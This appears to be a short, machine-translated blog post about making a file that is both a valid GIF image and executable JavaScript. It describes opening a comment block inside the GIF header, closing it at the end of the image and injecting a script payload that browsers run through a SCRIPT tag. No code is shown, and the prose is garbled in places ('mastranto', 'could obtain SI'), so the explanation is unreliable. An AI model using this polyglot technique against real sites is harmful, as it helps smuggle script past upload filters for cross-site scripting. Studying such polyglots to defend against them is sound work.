A dirty little technique – Java script embedded GIF images, in which, pictures are still valid and will be processed by any browser. The following HTML page you want to scan a valid GIF file and a file Java script rigorously valid simultaneously.? the answer should be NO but forging correctly answer could obtain SI
If we make the query result is the serious answer.
As we can see both labels were successful, the IMG tag is fulfilling its work mastranto GIF image and that is the “TEST IMAGE” the SCRIPT tag in the same way showing running ALERT As is possible.?.
The following image shows details like the dirty code generates the GIF file.
This is no witch or black magic, it’s just an implementation error parsing GIF, many libraries have this error analysis, the idea behind this python code is to create a GIF header valid within ( x2F x2A AKA *) and then close the end of the image through a ( x2A x2F AKA *) before injecting the payload is possible to inject a simple expression like “= 1” or more commonly “= to, “in order to use all of the GIF as a block variable.
The following image shows the first part of a GIF head to exploit this weakness.
Having cast the characters for “filler” in this case fill “= a;” as characters that are useful for the JS interpreter, because this way we can run two labels in my process a GIF and SCRIPT in any browser.